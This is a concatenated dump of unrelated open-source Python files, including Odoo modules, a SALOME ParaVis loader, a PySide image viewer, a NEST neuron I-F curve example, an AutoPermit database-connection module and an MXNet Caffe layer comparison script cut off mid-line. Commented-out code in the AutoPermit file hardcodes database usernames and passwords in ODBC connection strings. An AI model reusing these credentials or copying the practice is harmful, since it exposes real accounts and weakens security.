' + str(self.amount)) values['partner_id'] = self.partner_id.id values['journal_id'] = self.journal_id.id values['type'] = 'in_invoice' invoice_id = invoice_obj.create(values) self.line_id.write({'invoice_id': invoice_id.id, 'paid': 1, 'journal_id': self.journal_id.id, 'partner_id': self.partner_id.id, 'amount': self.amount}) return {'type': 'ir.actions.act_window_close'}
agpl-3.0
FedoraScientific/salome-paravis
src/PV_SWIG/paravis.py
1
3020
# Copyright (C) 2010-2014 CEA/DEN, EDF R&D # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA # # See http://www.salome-platform.org/ or email : [email protected] # # File : paravis.py # Module : PARAVIS # import os, new import PARAVIS import SALOME import SALOME_Session_idl import SALOMEDS import SALOME_ModuleCatalog from omniORB import CORBA from time import sleep from salome import * myORB = None myNamingService = None myLifeCycleCORBA = None myNamingService = None myLocalStudyManager = None myLocalStudy = None myLocalParavis = None myDelay = None mySession = None ## Initialization of paravis server def Initialize(theORB, theNamingService, theLifeCycleCORBA, theStudyManager, theStudy, theDelay) : global myORB, myNamingService, myLifeCycleCORBA, myLocalStudyManager, myLocalStudy global mySession, myDelay myDelay = theDelay myORB = theORB myNamingService = theNamingService myLifeCycleCORBA = theLifeCycleCORBA myLocalStudyManager = theStudyManager while mySession == None: mySession = myNamingService.Resolve("/Kernel/Session") mySession = mySession._narrow(SALOME.Session) mySession.GetInterface() myDelay = theDelay sleep(myDelay) myLocalParavis = myLifeCycleCORBA.FindOrLoadComponent("FactoryServer", "PARAVIS") myLocalStudy = theStudy myLocalParavis.SetCurrentStudy(myLocalStudy) myLocalParavis.ActivateModule() return myLocalParavis def ImportFile(theFileName): "Import a file of any format supported by ParaView" myParavis.ImportFile(theFileName) def createFunction(theName): "Create function - constructor of Paravis object" def MyFunction(): return myParavis.CreateClass(theName) return MyFunction def createConstructors(): "Create constructor functions according to list of extracted classes" g = globals() aClassNames = myParavis.GetClassesList(); for aName in aClassNames: g[aName] = createFunction(aName) ## Initialize of a PARAVIS interface myParavis = Initialize(orb, naming_service,lcc,myStudyManager,myStudy, 2) ## Initialize constructor functions createConstructors() ## Initialize Paravis static objects vtkSMObject = vtkSMObject() vtkProcessModule = vtkProcessModule() vtkPVPythonModule = vtkPVPythonModule() vtkSMProxyManager = vtkSMProxyManager()
lgpl-2.1
viktorradnai/screenwarp
utils/create_chessboard.py
1
2170
#!/usr/bin/python import cv2 import wand.image import wand.color import wand.drawing import sys import logging import argparse logger = logging.getLogger(__name__) def parse_cmdline(): parser = argparse.ArgumentParser(description=''' TODO: insert description.''' ) parser.add_argument('-v', '--verbose', action='store_true', help="Enable verbose output") parser.add_argument('-q', '--quiet', action='store_true', help="Output errors only") parser.add_argument('-W', '--width', type=int, help="Target screen width. This will be the width of the output image.", default=1920) parser.add_argument('-H', '--height', type=int, help="Target screen height. This will be the height of the output image.", default=1080) parser.add_argument('-c', '--cols', type=int, help="Number of squares per column", default=16) parser.add_argument('-r', '--rows', type=int, help="Number of squares per row", default=9) parser.add_argument('filename', help="Image file") args = parser.parse_args() if args.verbose: loglevel = logging.DEBUG elif args.quiet: loglevel = logging.ERROR else: loglevel = logging.INFO logging.basicConfig(level=loglevel, format='%(asctime)s %(levelname)s %(message)s') return args def main(): args = parse_cmdline() screen_width = args.width screen_height = args.height square_width = screen_width / args.cols square_height = screen_height / args.rows image = wand.image.Image(width=screen_width, height=screen_height, background=wand.color.Color('#fff')) with wand.drawing.Drawing() as draw: draw.fill_color = wand.color.Color('#000') for r in range(args.rows): for c in range(args.cols): if not (c + r) % 2: continue x = square_width * c y = square_height * r logger.debug("%s %s %s %s", x, y, square_width, square_height) draw.rectangle(x, y, width=square_width, height=square_height) draw.draw(image) image.save(filename=args.filename) exit(0) # call main() if __name__ == '__main__': main()
gpl-3.0
lmregus/Portfolio
python/design_patterns/env/lib/python3.7/site-packages/IPython/utils/dir2.py
3
2232
# encoding: utf-8 """A fancy version of Python's builtin :func:`dir` function. """ # Copyright (c) IPython Development Team. # Distributed under the terms of the Modified BSD License. import inspect import types def safe_hasattr(obj, attr): """In recent versions of Python, hasattr() only catches AttributeError. This catches all errors. """ try: getattr(obj, attr) return True except: return False def dir2(obj): """dir2(obj) -> list of strings Extended version of the Python builtin dir(), which does a few extra checks. This version is guaranteed to return only a list of true strings, whereas dir() returns anything that objects inject into themselves, even if they are later not really valid for attribute access (many extension libraries have such bugs). """ # Start building the attribute list via dir(), and then complete it # with a few extra special-purpose calls. try: words = set(dir(obj)) except Exception: # TypeError: dir(obj) does not return a list words = set() if safe_hasattr(obj, '__class__'): words |= set(dir(obj.__class__)) # filter out non-string attributes which may be stuffed by dir() calls # and poor coding in third-party modules words = [w for w in words if isinstance(w, str)] return sorted(words) def get_real_method(obj, name): """Like getattr, but with a few extra sanity checks: - If obj is a class, ignore everything except class methods - Check if obj is a proxy that claims to have all attributes - Catch attribute access failing with any exception - Check that the attribute is a callable object Returns the method or None. """ try: canary = getattr(obj, '_ipython_canary_method_should_not_exist_', None) except Exception: return None if canary is not None: # It claimed to have an attribute it should never have return None try: m = getattr(obj, name, None) except Exception: return None if inspect.isclass(obj) and not isinstance(m, types.MethodType): return None if callable(m): return m return None
mit
Symphonia/Searcher
ImageView.py
1
4861
from PySide import QtGui, QtCore import sys, os class ImageView(QtGui.QWidget): def __init__(self,imagelist,parent = None): super(ImageView,self).__init__(parent) self.imagesize = None self.mode = '' self.imageList = imagelist[0] self.index = imagelist[1] self.title_label = QtGui.QLabel(self) self.imagesizelabel = QtGui.QLabel(self) self.cursizelabel = QtGui.QLabel(self) self.image_label = QtGui.QLabel(self) self.image_label.setBackgroundRole(QtGui.QPalette.Base) self.image_label.setSizePolicy(QtGui.QSizePolicy.Ignored,QtGui.QSizePolicy.Ignored) self.image_label.setScaledContents(True) self.installEventFilter(self) CloseWindowAction = QtGui.QAction(self) CloseWindowAction.setShortcut("Ctrl+W") CloseWindowAction.triggered.connect(self.close) self.addAction(CloseWindowAction) self.scrollarea = QtGui.QScrollArea(self) self.scrollarea.setBackgroundRole(QtGui.QPalette.Dark) self.scrollarea.setWidget(self.image_label) hbox = QtGui.QHBoxLayout() hbox.addWidget(self.imagesizelabel) hbox.addWidget(self.title_label) hbox.addWidget(self.cursizelabel) hbox.setContentsMargins(3,0,3,0) qbox = QtGui.QVBoxLayout(self) qbox.addLayout(hbox) qbox.addWidget(self.scrollarea) qbox.setContentsMargins(0,5,0,0) info = QtCore.QFileInfo(self.imageList[self.index]) self.title_label.setText(info.fileName()) self.title_label.setAlignment(QtCore.Qt.AlignCenter) self.imagesizelabel.setAlignment(QtCore.Qt.AlignLeft) self.cursizelabel.setAlignment(QtCore.Qt.AlignRight) self.setMinimumHeight(10) self.setMinimumWidth(10) self.setWindowTitle('Image Viewer') self.setWindowFlags(QtCore.Qt.FramelessWindowHint) self.setAttribute(QtCore.Qt.WA_DeleteOnClose) self.setGeometry(10,10,500,400) if self.index ==0: self.open(self.imageList[0]) self.show() def open(self,image_path): if image_path: image = QtGui.QImage(image_path) if image.isNull(): QtGui.QMessageBox.information(self,"Image View","Cannot load %s." %image_path) return self.image_label.setPixmap(QtGui.QPixmap.fromImage(image)) self.scrollarea.setWidgetResizable(True) self.imagesize = image.size() self.updateTitle() def eventFilter(self,object,event): if event.type() == QtCore.QEvent.KeyRelease: if event.key() == QtCore.Qt.Key_Left: if self.index ==0: self.index = len(self.imageList) self.index-=1 self.open(self.imageList[self.index]) if event.key() == QtCore.Qt.Key_Right: if self.index>=len(self.imageList)-1: self.index =0 self.index+=1 self.open(self.imageList[self.index]) if event.key() == QtCore.Qt.Key_W: self.resize(500,400) if event.key() == QtCore.Qt.Key_R: if self.imagesize.height() > QtGui.QDesktopWidget().availableGeometry().height(): ratio = QtGui.QDesktopWidget().availableGeometry().height() / self.imagesize.height() self.resize(int(self.imagesize.width()*ratio),int(self.imagesize.height()*ratio)) else: self.resize(self.imagesize.width(),self.imagesize.height()) if event.key() == QtCore.Qt.Key_E: self.move(self.pos().x(),0) ratio = QtGui.QDesktopWidget().availableGeometry().height() / self.imagesize.height() self.resize(int(self.imagesize.width()*ratio),int(self.imagesize.height()*ratio)) self.updateTitle() if event.key() == QtCore.Qt.Key_Escape: self.close() if event.type() == QtCore.QEvent.MouseButtonPress: if event.pos().x() < self.size().width() -20: self.diff = event.globalPos() - self.frameGeometry().topLeft() self.mode = 'drag' else: self.mode = 'resize' if event.type() == QtCore.QEvent.MouseMove: if self.mode == 'drag': self.move(event.globalPos()-self.diff) else: self.resize(event.pos().x(),event.pos().y()) self.updateTitle() return False def updateTitle(self): info = QtCore.QFileInfo(self.imageList[self.index]) self.imagesizelabel.setText(str(self.imagesize.width()) +','+ str(self.imagesize.height()) + ' ->') self.title_label.setText(info.fileName()) self.cursizelabel.setText('<- ' + str(self.size().width()) + ',' + str(self.size().height())) def mousePressEvent(self,event): print(event.buttons()) if event.buttons() == QtCore.Qt.LeftButton: if event.pos().x() < self.size().width() -20: self.diff = event.globalPos() - self.frameGeometry().topLeft() self.mode = 'drag' else: self.mode = 'resize' def mouseMoveEvent(self,event): if event.buttons() == QtCore.Qt.LeftButton: if self.mode == 'drag': self.move(event.globalPos()-self.diff) else: self.resize(event.pos().x(),event.pos().y()) # def main(): # app = QtGui.QApplication(sys.argv) # imageview = ImageView() # sys.exit(app.exec_()) # if __name__ == '__main__': # main()
mit
hdinsight/hue
desktop/core/ext-py/lxml-3.4.4/src/lxml/html/tests/test_frames.py
20
1557
import unittest, sys from lxml.tests.common_imports import make_doctest, doctest import lxml.html from lxml.html import html_parser, XHTML_NAMESPACE class FrameTest(unittest.TestCase): def test_parse_fragments_fromstring(self): parser = lxml.html.HTMLParser(encoding='utf-8', remove_comments=True) html = """<frameset> <frame src="main.php" name="srcpg" id="srcpg" frameborder="0" rolling="Auto" marginwidth="" marginheight="0"> </frameset>""" etree_document = lxml.html.fragments_fromstring(html, parser=parser) self.assertEqual(len(etree_document), 1) root = etree_document[0] self.assertEqual(root.tag, "frameset") frame_element = root[0] self.assertEqual(frame_element.tag, 'frame') def test_parse_fromstring(self): parser = lxml.html.HTMLParser(encoding='utf-8', remove_comments=True) html = """<html><frameset> <frame src="main.php" name="srcpg" id="srcpg" frameborder="0" rolling="Auto" marginwidth="" marginheight="0"> </frameset></html>""" etree_document = lxml.html.fromstring(html, parser=parser) self.assertEqual(etree_document.tag, 'html') self.assertEqual(len(etree_document), 1) frameset_element = etree_document[0] self.assertEqual(len(frameset_element), 1) frame_element = frameset_element[0] self.assertEqual(frame_element.tag, 'frame') def test_suite(): loader = unittest.TestLoader() return loader.loadTestsFromModule(sys.modules[__name__])
apache-2.0
Silmathoron/nest-simulator
pynest/examples/if_curve.py
5
5195
# -*- coding: utf-8 -*- # # if_curve.py # # This file is part of NEST. # # Copyright (C) 2004 The NEST Initiative # # NEST is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 2 of the License, or # (at your option) any later version. # # NEST is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with NEST. If not, see <http://www.gnu.org/licenses/>. """IF curve example ---------------------- This example illustrates how to measure the I-F curve of a neuron. The program creates a small group of neurons and injects a noisy current :math:`I(t) = I_mean + I_std*W(t)` where :math:`W(t)` is a white noise process. The programm systematically drives the current through a series of values in the two-dimensional `(I_mean, I_std)` space and measures the firing rate of the neurons. In this example, we measure the I-F curve of the adaptive exponential integrate and fire neuron (``aeif_cond_exp``), but any other neuron model that accepts current inputs is possible. The model and its parameters are supplied when the IF_curve object is created. """ import numpy import nest import shelve ############################################################################### # Here we define which model and the neuron parameters to use for measuring # the transfer function. model = 'aeif_cond_exp' params = {'a': 4.0, 'b': 80.8, 'V_th': -50.4, 'Delta_T': 2.0, 'I_e': 0.0, 'C_m': 281.0, 'g_L': 30.0, 'V_reset': -70.6, 'tau_w': 144.0, 't_ref': 5.0, 'V_peak': -40.0, 'E_L': -70.6, 'E_ex': 0., 'E_in': -70.} class IF_curve(): t_inter_trial = 200. # Interval between two successive measurement trials t_sim = 1000. # Duration of a measurement trial n_neurons = 100 # Number of neurons n_threads = 4 # Nubmer of threads to run the simulation def __init__(self, model, params=False): self.model = model self.params = params self.build() self.connect() def build(self): ####################################################################### # We reset NEST to delete information from previous simulations # and adjust the number of threads. nest.ResetKernel() nest.SetKernelStatus({'local_num_threads': self.n_threads}) ####################################################################### # We set the default parameters of the neuron model to those # defined above and create neurons and devices. if self.params: nest.SetDefaults(self.model, self.params) self.neuron = nest.Create(self.model, self.n_neurons) self.noise = nest.Create('noise_generator') self.spike_detector = nest.Create('spike_detector') def connect(self): ####################################################################### # We connect the noisy current to the neurons and the neurons to # the spike detectors. nest.Connect(self.noise, self.neuron, 'all_to_all') nest.Connect(self.neuron, self.spike_detector, 'all_to_all') def output_rate(self, mean, std): self.build() self.connect() ####################################################################### # We adjust the parameters of the noise according to the current # values. self.noise.set(mean=mean, std=std, start=0.0, stop=1000., origin=0.) # We simulate the network and calculate the rate. nest.Simulate(self.t_sim) rate = self.spike_detector.n_events * 1000. / (1. * self.n_neurons * self.t_sim) return rate def compute_transfer(self, i_mean=(400.0, 900.0, 50.0), i_std=(0.0, 600.0, 50.0)): ####################################################################### # We loop through all possible combinations of `(I_mean, I_sigma)` # and measure the output rate of the neuron. self.i_range = numpy.arange(*i_mean) self.std_range = numpy.arange(*i_std) self.rate = numpy.zeros((self.i_range.size, self.std_range.size)) nest.set_verbosity('M_WARNING') for n, i in enumerate(self.i_range): print('I = {0}'.format(i)) for m, std in enumerate(self.std_range): self.rate[n, m] = self.output_rate(i, std) transfer = IF_curve(model, params) transfer.compute_transfer() ############################################################################### # After the simulation is finished we store the data into a file for # later analysis. with shelve.open(model + '_transfer.dat') as dat: dat['I_mean'] = transfer.i_range dat['I_std'] = transfer.std_range dat['rate'] = transfer.rate
gpl-2.0
Eficent/odoomrp-wip
stock_quant_valuation/tests/test_stock_quant_valuation.py
10
2798
# -*- coding: utf-8 -*- # (c) 2016 Ainara Galdona - AvanzOSC # License AGPL-3 - See http://www.gnu.org/licenses/agpl-3.0.html import openerp.tests.common as common from openerp import fields class TestStockQuantValuation(common.TransactionCase): def setUp(self): super(TestStockQuantValuation, self).setUp() self.quant_model = self.env['stock.quant'] self.hist_model = self.env['stock.history'] self.location_model = self.env['stock.location'] self.product = self.env.ref('product.product_product_34') self.location = self.location_model.search([('usage', '=', 'internal')], limit=1) def test_quant_valuation(self): self.product.sudo().write({'cost_method': 'real', 'standard_price': 20, 'manual_standard_cost': 35}) quant = self.quant_model.create( {'product_id': self.product.id, 'cost': 20, 'location_id': self.location.id, 'qty': 5}) self.assertEqual(quant.manual_value, (35 * 5), "Incorrect Manual Value for quant.") self.assertEqual(quant.real_value, (20 * 5), "Incorrect Real Value for quant.") def test_stock_history(self): hist_line = self.hist_model.search([], limit=1) hist_line.product_id.sudo().manual_standard_cost = 40 self.assertEqual(hist_line.manual_value, (hist_line.quantity * 40), "Incorrect Manual Value for history line.") self.assertEqual(hist_line.real_value, (hist_line.quantity * hist_line.price_unit_on_quant), "Incorrect Real Value for history line.") def test_stock_history_read_group(self): gfields = ['product_id', 'location_id', 'move_id', 'date', 'source', 'quantity', 'inventory_value', 'manual_value', 'real_value'] groupby = ['product_id'] domain = [('date', '<=', fields.Date.today())] res = self.hist_model.read_group( domain=domain, fields=gfields, groupby=groupby, offset=0, limit=None, orderby=False, lazy=True) if res: line = res[0] line_domain = line.get('__domain', domain) group_lines = self.hist_model.search(line_domain) sum_real = sum([x.real_value for x in group_lines]) sum_manual = sum([x.manual_value for x in group_lines]) self.assertEqual(line['real_value'], sum_real, "Real value not correct sum.") self.assertEqual(line['manual_value'], sum_manual, "Manual value not correct sum.")
agpl-3.0
L3nzian/AutoPermit
ap_connections.py
1
7082
#import pyodbc import odbc import _winreg import ConfigParser config_file = 'AutoPermit.ini' def get_config_dict(config_file, section): """ Reads a config file :param config_file: a config file usable by ConfigParser :param section: a section in the config file :return: a dictionary section's entries """ dict1 = {} config = ConfigParser.ConfigParser() config.optionxform = str # Override optionxform so that keys remain case-sensitive config.read(config_file) options = config.options(section) for option in options: try: dict1[option] = config.get(section, option) if dict1[option] == -1: print 'not an option' except: print("exception on %s!" % option) dict1[option] = None return dict1 def get_odbc_connection_string(con_string): """ :param con_string: Name of the odbc connection :return: odbc connection name/string from config_file """ odbc_connections = get_config_dict(config_file, 'odbc_connections') return odbc_connections[con_string] #print get_odbc_connection_string("DMMESDEConnection") # def MakeConnection(): # try: # strKeyPath = "SOFTWARE\ODBC\ODBC.INI\ODBC Data Sources" # odbckey = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, strKeyPath) # except Exception as e: # pass # try: # strValueName = "Dmlr_DB" # strValue = "SQL Server" # _winreg.SetValueEx(odbckey, strValueName, 0, _winreg.REG_SZ, strValue) # except: # pass # try: # strKeyPath = "SOFTWARE\ODBC\ODBC.INI\Dmlr_DB" # valKey = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, strKeyPath) # strValueName = "Database" # strValue = "dmlr" # _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue) # strValueName = "Driver" # strValue = "C:\WINDOWS\System32\SQLSRV32.dll" # _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue) # strValueName = "Server" # strValue = "wsq00796" # _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue) # strValueName = "Trusted_Connection" # strValue = "Yes" # _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue) # except: # pass # try: # _winreg.CloseKey(valKey) # except: # pass # try: # strValueName = "DMMESDEConnection" # strValue = "SQL Server" # _winreg.SetValueEx(odbckey, strValueName, 0, _winreg.REG_SZ, strValue) # except: # pass # try: # strKeyPath = "SOFTWARE\ODBC\ODBC.INI\DMMESDEConnection" # valKey = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, strKeyPath) # strValueName = "Database" # strValue = "Ep" # _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue) # strValueName = "Driver" # strValue = "C:\WINDOWS\System32\SQLSRV32.dll" # _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue) # strValueName = "Server" # strValue = "wsq00796" # _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue) # strValueName = "Trusted_Connection" # strValue = "Yes" # _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue) # except: # pass # try: # _winreg.CloseKey(valKey) # except: # pass # try: # strValueName = "WaterQuality" # strValue = "SQL Server" # _winreg.SetValueEx(odbckey, strValueName, 0, _winreg.REG_SZ, strValue) # except: # pass # try: # strKeyPath = "SOFTWARE\ODBC\ODBC.INI\WaterQuality" # valKey = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, strKeyPath) # strValueName = "Database" # strValue = "WaterQuality" # _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue) # strValueName = "Driver" # strValue = "C:\WINDOWS\System32\SQLSRV32.dll" # _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue) # strValueName = "Server" # strValue = "DMMESDE" # _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue) # strValueName = "Trusted_Connection" # strValue = "Yes" # _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue) # except: # pass # try: # _winreg.CloseKey(valKey) # except: # pass # try: # strValueName = "H2O" # strValue = "SQL Server" # _winreg.SetValueEx(odbckey, strValueName, 0, _winreg.REG_SZ, strValue) # except: # pass # try: # strKeyPath = "SOFTWARE\ODBC\ODBC.INI\H2O" # valKey = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, strKeyPath) # strValueName = "Database" # strValue = "H2OSpatial" # _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue) # strValueName = "Driver" # strValue = "C:\WINDOWS\System32\SQLSRV32.dll" # _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue) # strValueName = "Server" # strValue = "DMMESDE" # _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue) # strValueName = "Trusted_Connection" # strValue = "Yes" # _winreg.SetValueEx(valKey, strValueName, 0, _winreg.REG_SZ, strValue) # except: # pass # try: # _winreg.CloseKey(valKey) # except: # pass # try: # _winreg.CloseKey(odbckey) # except: # pass # try: # conn = odbc.odbc("Dmlr_DB") # conn2 = odbc.odbc("WaterQuality") # conn3 = odbc.odbc("DMMESDEConnection") # except: # try: # conn = odbc.odbc("DSN=Dmlr_DB2;UID=ags_service;PWD=Welcome1234") # conn2 = odbc.odbc("DSN=WaterQuality2;UID=wq_guest;PWD=wq_guest") # conn3 = odbc.odbc("DSN=DMMESDEConnection2;UID=ags_service;PWD=Welcome1234") # except: # conn = 1 # conn2 = 1 # conn3 = 1 # connList = [conn, conn2, conn3] # return connList # # # def get_ep_cursor(): # con = pyodbc.connect('Trusted_Connection=yes', # driver='{SQL Server}', # server='wsq00796', # database='EP') # return con.cursor() # # # def get_dmlr_cursor(): # con = pyodbc.connect('Trusted_Connection=yes', # driver='{SQL Server}', # server='wsq00796', # database='dmlr') # return con.cursor() # # # def get_wq_cursor(): # con = pyodbc.connect('Trusted_Connection=yes', # driver='{SQL Server}', # server='dmmesde', # database='WaterQuality') # return con.cursor()
gpl-2.0
luoyetx/mxnet
example/ssd/tools/caffe_converter/compare_layers.py
54
14536
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. """Test converted models layer by layer """ import os import argparse import logging import mxnet as mx import cv2 import numpy as np logging.basicConfig(level=logging.INFO) def read_image(img_path, image_dims=None, mean=None): """ Reads an image from file path or URL, optionally resizing to given image dimensions and subtracting mean. :param img_path: path to file, or url to download :param image_dims: image dimensions to resize to, or None :param mean: mean file to subtract, or None :return: loaded image, in RGB format """ import urllib filename = img_path.split("/")[-1] if img_path.startswith('http'): urllib.urlretrieve(img_path, filename) img = cv2.imread(filename) else: img = cv2.imread(img_path) img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) if image_dims is not None: img = cv2.resize(img, image_dims) # resize to image_dims to fit model img = np.rollaxis(img, 2) # change to (c, h, w) order img = img[np.newaxis, :] # extend to (n, c, h, w) if mean is not None: mean = np.array(mean) if mean.shape == (3,): mean = mean[np.newaxis, :, np.newaxis, np.newaxis] # extend to (n, c, 1, 1) img = img.astype(np.float32) - mean # subtract mean return img def _ch_dev(arg_params, aux_params, ctx): """ Changes device of given mxnet arguments :param arg_params: arguments :param aux_params: auxiliary parameters :param ctx: new device context :return: arguments and auxiliary parameters on new device """ new_args = dict() new_auxs = dict() for k, v in arg_params.items(): new_args[k] = v.as_in_context(ctx) for k, v in aux_params.items(): new_auxs[k] = v.as_in_context(ctx) return new_args, new_auxs def convert_and_compare_caffe_to_mxnet(image_url, gpu, caffe_prototxt_path, caffe_model_path, caffe_mean, mean_diff_allowed, max_diff_allowed): """ Run the layer comparison on a caffe model, given its prototxt, weights and mean. The comparison is done by inferring on a given image using both caffe and mxnet model :param image_url: image file or url to run inference on :param gpu: gpu to use, -1 for cpu :param caffe_prototxt_path: path to caffe prototxt :param caffe_model_path: path to caffe weights :param caffe_mean: path to caffe mean file """ import caffe from caffe_proto_utils import read_network_dag, process_network_proto, read_caffe_mean from convert_model import convert_model if isinstance(caffe_mean, str): caffe_mean = read_caffe_mean(caffe_mean) elif caffe_mean is None: pass elif len(caffe_mean) == 3: # swap channels from Caffe BGR to RGB caffe_mean = caffe_mean[::-1] # get caffe root location, this is needed to run the upgrade network utility, so we only need # to support parsing of latest caffe caffe_root = os.path.dirname(os.path.dirname(caffe.__path__[0])) caffe_prototxt_path = process_network_proto(caffe_root, caffe_prototxt_path) _, layer_name_to_record, top_to_layers = read_network_dag(caffe_prototxt_path) caffe.set_mode_cpu() caffe_net = caffe.Net(caffe_prototxt_path, caffe_model_path, caffe.TEST) image_dims = tuple(caffe_net.blobs['data'].shape)[2:4] logging.info('getting image %s', image_url) img_rgb = read_image(image_url, image_dims, caffe_mean) img_bgr = img_rgb[:, ::-1, :, :] caffe_net.blobs['data'].reshape(*img_bgr.shape) caffe_net.blobs['data'].data[...] = img_bgr _ = caffe_net.forward() # read sym and add all outputs sym, arg_params, aux_params, _ = convert_model(caffe_prototxt_path, caffe_model_path) sym = sym.get_internals() # now mxnet if gpu < 0: ctx = mx.cpu(0) else: ctx = mx.gpu(gpu) arg_params, aux_params = _ch_dev(arg_params, aux_params, ctx) arg_params["data"] = mx.nd.array(img_rgb, ctx) arg_params["prob_label"] = mx.nd.empty((1,), ctx) exe = sym.bind(ctx, arg_params, args_grad=None, grad_req="null", aux_states=aux_params) exe.forward(is_train=False) compare_layers_from_nets(caffe_net, arg_params, aux_params, exe, layer_name_to_record, top_to_layers, mean_diff_allowed, max_diff_allowed) return def _bfs(root_node, process_node): """ Implementation of Breadth-first search (BFS) on caffe network DAG :param root_node: root node of caffe network DAG :param process_node: function to run on each node """ from collections import deque seen_nodes = set() next_nodes = deque() seen_nodes.add(root_node) next_nodes.append(root_node) while next_nodes: current_node = next_nodes.popleft() # process current node process_node(current_node) for child_node in current_node.children: if child_node not in seen_nodes: seen_nodes.add(child_node) next_nodes.append(child_node) def compare_layers_from_nets(caffe_net, arg_params, aux_params, exe, layer_name_to_record, top_to_layers, mean_diff_allowed, max_diff_allowed): """ Compare layer by layer of a caffe network with mxnet network :param caffe_net: loaded caffe network :param arg_params: arguments :param aux_params: auxiliary parameters :param exe: mxnet model :param layer_name_to_record: map between caffe layer and information record :param top_to_layers: map between caffe blob name to layers which outputs it (including inplace) :param mean_diff_allowed: mean difference allowed between caffe blob and mxnet blob :param max_diff_allowed: max difference allowed between caffe blob and mxnet blob """ import re log_format = ' {0:<40} {1:<40} {2:<8} {3:>10} {4:>10} {5:<1}' compare_layers_from_nets.is_first_convolution = True def _compare_blob(caf_blob, mx_blob, caf_name, mx_name, blob_type, note): diff = np.abs(mx_blob - caf_blob) diff_mean = diff.mean() diff_max = diff.max() logging.info(log_format.format(caf_name, mx_name, blob_type, '%4.5f' % diff_mean, '%4.5f' % diff_max, note)) assert diff_mean < mean_diff_allowed assert diff_max < max_diff_allowed def _process_layer_parameters(layer): logging.debug('processing layer %s of type %s', layer.name, layer.type) normalized_layer_name = re.sub('[-/]', '_', layer.name) # handle weight and bias of convolution and fully-connected layers if layer.name in caffe_net.params and layer.type in ['Convolution', 'InnerProduct', 'Deconvolution']: has_bias = len(caffe_net.params[layer.name]) > 1 mx_name_weight = '{}_weight'.format(normalized_layer_name) mx_beta = arg_params[mx_name_weight].asnumpy() # first convolution should change from BGR to RGB if layer.type == 'Convolution' and compare_layers_from_nets.is_first_convolution: compare_layers_from_nets.is_first_convolution = False # if RGB or RGBA if mx_beta.shape[1] == 3 or mx_beta.shape[1] == 4: # Swapping BGR of caffe into RGB in mxnet mx_beta[:, [0, 2], :, :] = mx_beta[:, [2, 0], :, :] caf_beta = caffe_net.params[layer.name][0].data _compare_blob(caf_beta, mx_beta, layer.name, mx_name_weight, 'weight', '') if has_bias: mx_name_bias = '{}_bias'.format(normalized_layer_name) mx_gamma = arg_params[mx_name_bias].asnumpy() caf_gamma = caffe_net.params[layer.name][1].data _compare_blob(caf_gamma, mx_gamma, layer.name, mx_name_bias, 'bias', '') elif layer.name in caffe_net.params and layer.type == 'Scale': if 'scale' in normalized_layer_name: bn_name = normalized_layer_name.replace('scale', 'bn') elif 'sc' in normalized_layer_name: bn_name = normalized_layer_name.replace('sc', 'bn') else: assert False, 'Unknown name convention for bn/scale' beta_name = '{}_beta'.format(bn_name) gamma_name = '{}_gamma'.format(bn_name) mx_beta = arg_params[beta_name].asnumpy() caf_beta = caffe_net.params[layer.name][1].data _compare_blob(caf_beta, mx_beta, layer.name, beta_name, 'mov_mean', '') mx_gamma = arg_params[gamma_name].asnumpy() caf_gamma = caffe_net.params[layer.name][0].data _compare_blob(caf_gamma, mx_gamma, layer.name, gamma_name, 'mov_var', '') elif layer.name in caffe_net.params and layer.type == 'BatchNorm': mean_name = '{}_moving_mean'.format(normalized_layer_name) var_name = '{}_moving_var'.format(normalized_layer_name) caf_rescale_factor = caffe_net.params[layer.name][2].data mx_mean = aux_params[mean_name].asnumpy() caf_mean = caffe_net.params[layer.name][0].data / caf_rescale_factor _compare_blob(caf_mean, mx_mean, layer.name, mean_name, 'mean', '') mx_var = aux_params[var_name].asnumpy() caf_var = caffe_net.params[layer.name][1].data / caf_rescale_factor _compare_blob(caf_var, mx_var, layer.name, var_name, 'var', 'expect 1e-04 change due to cudnn eps') elif layer.type in ['Input', 